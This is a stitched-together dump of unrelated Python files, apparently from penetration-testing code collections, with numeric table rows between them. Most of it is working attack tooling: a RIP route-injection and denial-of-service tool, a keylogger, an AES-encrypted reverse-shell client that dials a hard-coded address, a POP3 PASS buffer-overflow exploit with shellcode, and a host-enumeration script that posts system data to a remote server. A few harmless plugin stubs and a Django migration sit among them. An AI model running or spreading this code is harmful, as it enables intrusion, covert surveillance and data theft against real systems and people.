    parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
    parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
    parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
    parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
    auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
    auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
    auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
    route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
    route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
    route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
    route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
    route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
    args = parser.parse_args()
    # BUG FIX: `'attack' in args` was always True because the attribute always
    # exists (default=''), so this error could never trigger. Test the value.
    if not args.attack:
        Logger.err('You must specify an attack to launch!')
        return False
    if args.attack == 'list':
        print("Available attacks:")
        for a in attacks:
            print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
        sys.exit(0)
    else:
        att = args.attack
        try:
            att = int(att)      # numeric selection, e.g. "-t 2"
        except ValueError:
            pass                # keep symbolic name, e.g. "-t ripv2-dos"
        for a in attacks:
            if att == a['num'] or att == a['name']:
                config['attack'] = a
                break
    if 'attack' not in config or not config['attack']:
        Logger.err("Selected attack is not implemented or wrongly stated.")
        parser.print_help()
        return False
    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['delay'] = args.delay
    if args.interface != '': config['interface'] = args.interface
    else: config['interface'] = selectDefaultInterface()
    # BUG FIX: --network has no default, so it is None when omitted; the old
    # `!= ''` test was then True and clobbered config['network'] with None.
    if args.network: config['network'] = args.network
    if args.spoof != '': config['spoof'] = args.spoof
    else: config['spoof'] = getIfaceIP(config['interface'])
    Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
    if args.netmask: config['netmask'] = args.netmask
    if args.nexthop: config['nexthop'] = args.nexthop
    # BUG FIX: metric is parsed as int, so `args.metric != ''` was always True;
    # assign it unconditionally (argparse guarantees the default of 10).
    config['metric'] = args.metric
    if args.auth_type != '': config['auth-type'] = args.auth_type
    if args.auth_data != '': config['auth-data'] = args.auth_data
    if config['auth-type'] != '':
        if config['auth-data'] == '':
            Logger.err("You must specify authentication data along with the --auth-type.")
            return False
        # Removed redundant re-assignment of auth-type/auth-data here:
        # both were already copied from args above.
    return args
def main(argv):
    """Toolkit driver: build the attack registry, parse options, run the attack.

    Populates the module-global `attacks` tuple (each entry maps a number and
    name to an implementing class plus per-attack parameter overrides), then
    instantiates and launches whichever attack parseOptions() selected.
    Requires root (raw packet injection). Returns False on any setup error.
    """
    global attacks
    # Registry of available attacks; 'params' entries override the defaults
    # collected into `config` by parseOptions().
    attacks = (
        {
            'num': 0,
            'name': 'sniffer',
            'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
            'object': Sniffer,
            'params': {
            }
        },
        {
            'num': 1,
            'name': 'ripv1-route',
            'desc': 'RIP Spoofed Route announcement',
            'object': RIPv1v2Attacks,
            'params': {
                'version' : 1,
            }
        },
        {
            'num': 2,
            'name': 'ripv1-dos',
            'desc': 'RIPv1 Denial of Service by Null-routing',
            'object': RIPv1v2Attacks,
            'params': {
                'version' : 1,
                'delay' : 1,
                'network': '0.0.0.0',
                'metric': 1
            }
        },
        {
            'num': 3,
            'name': 'ripv1-ampl',
            'desc': 'RIPv1 Reflection Amplification DDoS',
            'object': RIPv1v2Attacks,
            'params': {
                'version' : 1,
                'delay' : 0.5,
                'network': '0.0.0.0',
                'netmask': '0.0.0.0',
                'nexthop': '0.0.0.1',
                'metric': 1,
                'AF': 0, # Unspecified
                'rip_cmd': 1, # Request
            }
        },
        {
            'num': 4,
            'name': 'ripv2-route',
            'desc': 'RIPv2 Spoofed Route announcement',
            'object': RIPv1v2Attacks,
            'params': {
                'version' : 2,
            }
        },
        {
            'num': 5,
            'name': 'ripv2-dos',
            'desc': 'RIPv2 Denial of Service by Null-routing',
            'object': RIPv1v2Attacks,
            'params': {
                'version' : 2,
                'delay' : 1,
                'network': '0.0.0.0',
                'netmask': '0.0.0.0',
                'nexthop': '0.0.0.1',
                'metric': 1
            }
        },
        {
            'num': 6,
            'name': 'rip-fuzzer',
            'desc': 'RIP/RIPv2 packets fuzzer',
            'object': RIPFuzzer,
            'params': {
            }
        },
    )
    opts = parseOptions(argv)
    if not opts:
        Logger.err('Options parsing failed.')
        return False
    # Raw packet crafting/injection needs root privileges.
    if os.getuid() != 0:
        Logger.err('This program must be run as root.')
        return False
    # Pull in the Scapy contrib dissectors used by the attack modules.
    load_contrib('ospf')
    load_contrib('eigrp')
    load_contrib('bgp')
    attack = config['attack']['object']()
    print("[+] Launching attack: {}".format(config['attack']['desc']))
    if attack.injectOptions(config['attack']['params'], config):
        attack.launch()
    else:
        Logger.err("Module prerequisite options were not passed correctly.")
# Script entry point: hand the raw process arguments to the driver.
if __name__ == '__main__':
    main(sys.argv)
| 31.831266 | 204 | 0.528174 |
owtf | """
GREP Plugin for Credentials transport over an encrypted channel (OWASP-AT-001)
https://www.owasp.org/index.php/Testing_for_credentials_transport_%28OWASP-AT-001%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
import logging
DESCRIPTION = "Searches transaction DB for credentials protections"
def run(PluginInfo):
    """Grep-plugin entry point (currently a stub).

    The original transaction-DB credential-transport check below is commented
    out pending a rewrite (see TODO); until then the plugin deliberately
    reports no findings by returning an empty result list.
    """
    # TODO: Needs fixing
    # Content = "This plugin looks for password fields and then checks the URL (i.e. http vs. https)<br />"
    # Content += "Uniqueness in this case is performed via URL + password field"
    # # This retrieves all hidden password fields found in the DB response bodies:
    # Command, RegexpName, Matches = ServiceLocator.get_component("transaction").GrepMultiLineResponseRegexp(ServiceLocator.get_component("config").Get('RESPONSE_REGEXP_FOR_PASSWORDS'))
    # # Now we need to check if the URL is https or not and count the insecure ones (i.e. not https)
    # IDs = []
    # InsecureMatches = []
    # for ID, FileMatch in Matches:
    #     if ID not in IDs:  # Retrieve Transaction from DB only once
    #         IDs.append(ID)  # Process each transaction only once
    #         Transaction = ServiceLocator.get_component("transaction").GetByID(ID)
    #         if 'https' != Transaction.URL.split(":")[0]:
    #             OWTFLogger.log("Transaction: "+ID+" contains passwords fields with a URL different than https")
    #             InsecureMatches.append([ID, Transaction.URL+": "+FileMatch])  # Need to make the unique work by URL + password
    # Message = "<br /><u>Total insecure matches: "+str(len(InsecureMatches))+'</u>'
    # OWTFLogger.log(Message)
    # Content += Message+"<br />"
    # Content += ServiceLocator.get_component("plugin_helper").DrawResponseMatchesTables([Command, RegexpName, InsecureMatches], PluginInfo)
    # return Content
    return []
| 54.484848 | 185 | 0.713115 |
Python-Penetration-Testing-Cookbook | from scrapy.item import Item, Field
class BookItem(Item):
    """Scrapy item holding one scraped book record."""
    title = Field()  # book title as scraped from the listing page
    price = Field()  # listed price (raw scraped text)
| 13.428571 | 35 | 0.66 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Plugin entry point: render a static placeholder string for manual testing."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
Effective-Python-Penetration-Testing | import pyxhook
# BUG FIX: the path literal was missing its opening quote (SyntaxError).
file_log = '/home/rejah/Desktop/file.log'

def OnKeyboardEvent(event):
    """pyxhook KeyDown callback: append each pressed key to file_log ('space' -> ' ')."""
    k = event.Key
    if k == "space": k = " "
    with open(file_log, 'a+') as keylogging:
        keylogging.write('%s\n' % k)

#instantiate HookManager class
hooks_manager = pyxhook.HookManager()
#listen to all keystrokes
# BUG FIX: the callback was registered under an undefined name (OnKeyPress);
# the handler defined above is OnKeyboardEvent.
hooks_manager.KeyDown = OnKeyboardEvent
#hook the keyboard
hooks_manager.HookKeyboard()
#start the session
hooks_manager.start() | 19.761905 | 43 | 0.708046 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# Hybrid - Client - TCP Reverse Shell
import socket
import subprocess
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES
def GET_AES_KEY(KEY):
    """Decrypt the RSA-encrypted blob `KEY` received from the handler.

    The server encrypts the session's AES key/counter with the matching RSA
    public key; this client decrypts them with the private key embedded below.
    NOTE(review): hard-coding a private key in source is insecure by design
    here (demo tooling) - do not reuse this pattern.
    """
    privatekey = """-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----"""
    decryptor = RSA.importKey(privatekey)
    # Raw (textbook) RSA decrypt of the received key material.
    AES_Key = decryptor.decrypt(KEY)
    return AES_Key
def encrypt(message):
    """AES-CTR encrypt `message` with the globally negotiated key/counter."""
    cipher = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return cipher.encrypt(message)
def decrypt(message):
    """AES-CTR decrypt `message` with the globally negotiated key/counter."""
    cipher = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    return cipher.decrypt(message)
def connect():
    """Reverse-shell client loop: dial the handler, set up AES, execute commands.

    Receives the RSA-encrypted AES key and counter (two separate recv()s),
    decrypts them with GET_AES_KEY, then loops: decrypt a command, run it via
    the shell, and send back AES-encrypted stdout and stderr. 'terminate'
    closes the connection.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.10.10.100', 8080))  # handler address hard-coded
    global key, counter
    x = s.recv(1024)
    key = GET_AES_KEY( x )
    print "Generated AES Key " + str(key)
    y = s.recv(1024)
    counter = GET_AES_KEY( y )
    while True:
        command = decrypt(s.recv(1024))
        print ' We received: ' + command
        if 'terminate' in command:
            s.close()
            break
        else:
            # shell=True: the received string is run verbatim by the shell.
            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( encrypt (CMD.stdout.read() ) )
            s.send( encrypt (CMD.stderr.read()) )
def main():
    """Entry point: hand control to the reverse-shell client loop."""
    connect()

main()
| 36.796992 | 127 | 0.813569 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
# POP3 PASS-command buffer-overflow exploit (Python 2).
# Overflow layout: 2606 filler bytes, a 4-byte overwrite (\x8f\x35\x4a\x5f),
# then the encoded payload below.
buffer=["A"]
counter=100
# Encoded shellcode blob (payload bytes; name suggests a listener on
# port 1433 - TODO confirm against the generator options).
LPORT1433 = ""
LPORT1433 += "\x9b\x98\x40\x48\x4b\x98\xd6\x41\x41\x42\xda\xd8"
LPORT1433 += "\xd9\x74\x24\xf4\xbd\x24\x8b\x25\x21\x58\x29\xc9"
LPORT1433 += "\xb1\x52\x83\xe8\xfc\x31\x68\x13\x03\x4c\x98\xc7"
LPORT1433 += "\xd4\x70\x76\x85\x17\x88\x87\xea\x9e\x6d\xb6\x2a"
LPORT1433 += "\xc4\xe6\xe9\x9a\x8e\xaa\x05\x50\xc2\x5e\x9d\x14"
LPORT1433 += "\xcb\x51\x16\x92\x2d\x5c\xa7\x8f\x0e\xff\x2b\xd2"
LPORT1433 += "\x42\xdf\x12\x1d\x97\x1e\x52\x40\x5a\x72\x0b\x0e"
LPORT1433 += "\xc9\x62\x38\x5a\xd2\x09\x72\x4a\x52\xee\xc3\x6d"
LPORT1433 += "\x73\xa1\x58\x34\x53\x40\x8c\x4c\xda\x5a\xd1\x69"
LPORT1433 += "\x94\xd1\x21\x05\x27\x33\x78\xe6\x84\x7a\xb4\x15"
LPORT1433 += "\xd4\xbb\x73\xc6\xa3\xb5\x87\x7b\xb4\x02\xf5\xa7"
LPORT1433 += "\x31\x90\x5d\x23\xe1\x7c\x5f\xe0\x74\xf7\x53\x4d"
LPORT1433 += "\xf2\x5f\x70\x50\xd7\xd4\x8c\xd9\xd6\x3a\x05\x99"
LPORT1433 += "\xfc\x9e\x4d\x79\x9c\x87\x2b\x2c\xa1\xd7\x93\x91"
LPORT1433 += "\x07\x9c\x3e\xc5\x35\xff\x56\x2a\x74\xff\xa6\x24"
LPORT1433 += "\x0f\x8c\x94\xeb\xbb\x1a\x95\x64\x62\xdd\xda\x5e"
LPORT1433 += "\xd2\x71\x25\x61\x23\x58\xe2\x35\x73\xf2\xc3\x35"
LPORT1433 += "\x18\x02\xeb\xe3\x8f\x52\x43\x5c\x70\x02\x23\x0c"
LPORT1433 += "\x18\x48\xac\x73\x38\x73\x66\x1c\xd3\x8e\xe1\xe3"
LPORT1433 += "\x8c\x6a\x63\x8b\xce\x8a\x81\xd5\x46\x6c\xe3\xf5"
LPORT1433 += "\x0e\x27\x9c\x6c\x0b\xb3\x3d\x70\x81\xbe\x7e\xfa"
LPORT1433 += "\x26\x3f\x30\x0b\x42\x53\xa5\xfb\x19\x09\x60\x03"
LPORT1433 += "\xb4\x25\xee\x96\x53\xb5\x79\x8b\xcb\xe2\x2e\x7d"
LPORT1433 += "\x02\x66\xc3\x24\xbc\x94\x1e\xb0\x87\x1c\xc5\x01"
LPORT1433 += "\x09\x9d\x88\x3e\x2d\x8d\x54\xbe\x69\xf9\x08\xe9"
LPORT1433 += "\x27\x57\xef\x43\x86\x01\xb9\x38\x40\xc5\x3c\x73"
LPORT1433 += "\x53\x93\x40\x5e\x25\x7b\xf0\x37\x70\x84\x3d\xd0"
LPORT1433 += "\x74\xfd\x23\x40\x7a\xd4\xe7\x70\x31\x74\x41\x19"
LPORT1433 += "\x9c\xed\xd3\x44\x1f\xd8\x10\x71\x9c\xe8\xe8\x86"
LPORT1433 += "\xbc\x99\xed\xc3\x7a\x72\x9c\x5c\xef\x74\x33\x5c"
LPORT1433 += "\x3a"
#Bingo this works--Had an issue with bad chars.Rev shell also works like charm
# Filler: 2606 'A' bytes up to the saved return address.
buffer = '\x41' * 2606
if 1:
    print"Fuzzing PASS with %s bytes" % len(buffer)
    #print str(string)
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # Target POP3 service.
    connect=s.connect(('192.168.250.136',110))
    data=s.recv(1024)
    #print str(data)
    s.send('USER username \r\n')
    data=s.recv(1024)
    print str(data)
    # PASS <filler><EIP overwrite \x8f\x35\x4a\x5f><payload>
    s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ LPORT1433 + '\r\n')
    #data=s.recv(1024)
    #print str(data)
    print "done"
    #s.send('QUIT\r\n')
    s.close()
| 40.903226 | 78 | 0.680786 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Michael Spreitzenbarth (research@spreitzenbarth.de)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys, subprocess
import sqlite3 as lite
from prettytable import from_db_cursor
def dump_database(backup_dir):
    """Pull the Android contacts database (contacts2.db) into backup_dir via adb."""
    # dumping the password/pin from the device
    print "Dumping contacts database ..."
    contactsDB = subprocess.Popen(['adb', 'pull', '/data/data/com.android.providers.contacts/databases/contacts2.db',
        backup_dir], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
    contactsDB.wait()  # block until the pull finishes
def get_content(backup_dir):
    """Print every contact row from the pulled contacts2.db as a pretty table.

    The SELECT mirrors the Android contacts provider's own view query,
    joining contacts with their name_raw_contact rows.
    """
    # getting the content from the contacts database
    con = lite.connect(backup_dir + '/contacts2.db')
    cur = con.cursor()
    cur.execute("SELECT contacts._id AS _id,contacts.custom_ringtone AS custom_ringtone, name_raw_contact.display_name_source AS display_name_source, name_raw_contact.display_name AS display_name, name_raw_contact.display_name_alt AS display_name_alt, name_raw_contact.phonetic_name AS phonetic_name, name_raw_contact.phonetic_name_style AS phonetic_name_style, name_raw_contact.sort_key AS sort_key, name_raw_contact.phonebook_label AS phonebook_label, name_raw_contact.phonebook_bucket AS phonebook_bucket, name_raw_contact.sort_key_alt AS sort_key_alt, name_raw_contact.phonebook_label_alt AS phonebook_label_alt, name_raw_contact.phonebook_bucket_alt AS phonebook_bucket_alt, has_phone_number, name_raw_contact_id, lookup, photo_id, photo_file_id, CAST(EXISTS (SELECT _id FROM visible_contacts WHERE contacts._id=visible_contacts._id) AS INTEGER) AS in_visible_group, status_update_id, contacts.contact_last_updated_timestamp, contacts.last_time_contacted AS last_time_contacted, contacts.send_to_voicemail AS send_to_voicemail, contacts.starred AS starred, contacts.pinned AS pinned, contacts.times_contacted AS times_contacted, (CASE WHEN photo_file_id IS NULL THEN (CASE WHEN photo_id IS NULL OR photo_id=0 THEN NULL ELSE 'content://com.android.contacts/contacts/'||contacts._id|| '/photo' END) ELSE 'content://com.android.contacts/display_photo/'||photo_file_id END) AS photo_uri, (CASE WHEN photo_id IS NULL OR photo_id=0 THEN NULL ELSE 'content://com.android.contacts/contacts/'||contacts._id|| '/photo' END) AS photo_thumb_uri, 0 AS is_user_profile FROM contacts JOIN raw_contacts AS name_raw_contact ON(name_raw_contact_id=name_raw_contact._id)")
    pt = from_db_cursor(cur)
    con.close()
    print pt
    '''
    print "\033[0;32mid, custom_ringtone, display_name_source, display_name, display_name_alt, phonetic_name, phonetic_name_style, sort_key, phonebook_label, phonebook_bucket, sort_key_alt, phonebook_label_alt, phonebook_bucket_alt, has_phone_number, name_raw_contact_id, lookup, photo_id, photo_file_id, in_visible_group, status_update_id, contact_last_updated_timestamp, last_time_contacted, send_to_voicemail, starred, pinned, times_contacted, photo_uri, photo_thumb_uri, is_user_profile\033[m"
    for entry in data:
        print "\033[0;32m" + str(entry) + "\033[m"
    '''
if __name__ == '__main__':
    # check if device is connected and adb is running as root
    if subprocess.Popen(['adb', 'get-state'], stdout=subprocess.PIPE).communicate(0)[0].split("\n")[0] == "unknown":
        print "no device connected - exiting..."
        sys.exit(2)
    # starting to create the output directory (argv[1] = destination dir)
    backup_dir = sys.argv[1]
    try:
        os.stat(backup_dir)
    except:
        # directory does not exist yet - create it
        os.mkdir(backup_dir)
    dump_database(backup_dir)
    get_content(backup_dir)
| 60.073529 | 1,658 | 0.734586 |
cybersecurity-penetration-testing | import requests
import time
def check_httponly(c):
    """Return True when cookie `c` carries the HttpOnly flag, else a red 'False' string."""
    if 'httponly' not in c._rest.keys():
        return '\x1b[31mFalse\x1b[39;49m'
    return True
#req = requests.get('http://www.realvnc.com/support')
# Fetch the page five times and audit each cookie's Secure/HttpOnly flags.
values = []
for i in xrange(0,5):
    req = requests.get('http://www.google.com')
    for cookie in req.cookies:
        print 'Name:', cookie.name
        print 'Value:', cookie.value
        values.append(cookie.value)  # collect values to spot rotation later
        if not cookie.secure:
            # Display missing Secure flag in red.
            cookie.secure = '\x1b[31mFalse\x1b[39;49m'
        print 'HTTPOnly:', check_httponly(cookie), '\n'
    time.sleep(2)  # small delay between requests
print set(values) | 22.869565 | 53 | 0.689781 |
PenTestScripts | #!/usr/bin/env python
# This script enumerates information from the local system
import ctypes
import os
import socket
import string
import subprocess
import urllib2
# URL - You obviously need to edit this, just the IP/domain
url = "https://192.168.1.1/post_enum_data.php"

# Enumerate IP addresses and hostname
host, alias, ip = socket.gethostbyname_ex(socket.gethostname())

# Get full hostname (including domain if applicable)
host = socket.getfqdn()

# Enumerate system drives (GetLogicalDrives returns a bitmask: bit 0 = A:, ...)
drive_space = {}
drives = []
bitmask = ctypes.windll.kernel32.GetLogicalDrives()
for letter in string.uppercase:
    if bitmask & 1:
        drives.append(letter)
    bitmask >>= 1

# get username based off of environmental variable
# might not be true, but probably us
username = os.getenv('USERNAME')

# Get free space per drive in megabytes via GetDiskFreeSpaceExW
for drive_letter in drives:
    free_bytes = ctypes.c_ulonglong(0)
    ctypes.windll.kernel32.GetDiskFreeSpaceExW(
        ctypes.c_wchar_p(drive_letter + ":"), None, None, ctypes.pointer(
            free_bytes))
    free_megs = free_bytes.value / 1024 / 1024
    drive_space[drive_letter] = free_megs

# Get running processes
tasklist_output = subprocess.check_output("tasklist")

# Assemble one text report of everything gathered above.
data_to_transmit = "hostname - " + str(host) + "\nIP Address(es) - " + str(ip) + "\nSystem Drives and Free Space in Megs - " + str(drive_space) + "\nTasklist Output - " + tasklist_output

# Post the data over https
f = urllib2.urlopen(url, data_to_transmit)
f.close()
| 27.666667 | 186 | 0.712526 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the migration: create all xtreme_server tables and signal South."""
        # Adding model 'Project'
        db.create_table(u'xtreme_server_project', (
            ('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
            ('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
            ('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('auth_mode', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['Project'])

        # Adding model 'Page'
        db.create_table(u'xtreme_server_page', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
            ('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Page'])

        # Adding model 'Form'
        db.create_table(u'xtreme_server_form', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
